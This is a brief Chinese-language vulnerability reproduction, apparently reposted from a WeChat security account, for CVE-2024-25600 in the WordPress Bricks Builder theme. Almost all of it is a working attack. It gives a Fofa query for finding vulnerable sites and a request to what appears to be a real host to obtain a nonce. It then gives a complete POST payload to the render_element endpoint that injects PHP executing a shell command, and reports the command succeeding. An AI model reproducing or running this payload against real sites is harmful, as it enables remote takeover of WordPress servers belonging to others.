【WordPress Bricks Builder远程代码执行(CVE-2024-25600)】
资产测绘
Fofa: body="/wp-content/themes/bricks/"
漏洞利用
漏洞复现
GET
/
HTTP/2
Host
: bricks.gajdosik.co
User-Agent
: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection
: close
Accept-Encoding: gzip
使用得到的nonce值构造数据包进行发送
POST
/wp-json/bricks/v1/render_element
HTTP/2
Host
: xxx
User-Agent
: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length
: 358
Content-Type
: application/json
Accept-Encoding
: gzip
{
"postId"
:
"1"
,
"nonce"
:
"上一步得到的nonce值"
,
"element"
: {
"name"
:
"container"
,
"settings"
: {
"hasLoop"
:
"true"
,
"query"
: {
"useQueryEditor"
:
true
,
"queryEditor"
:
"ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);"
,
"objectType"
:
"post"
}
}
}
}
如下,成功执行id命令
原文始发于微信公众号(银遁安全团队):WordPress Bricks Builder远程代码执行(CVE-2024-25600)附POC工具
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论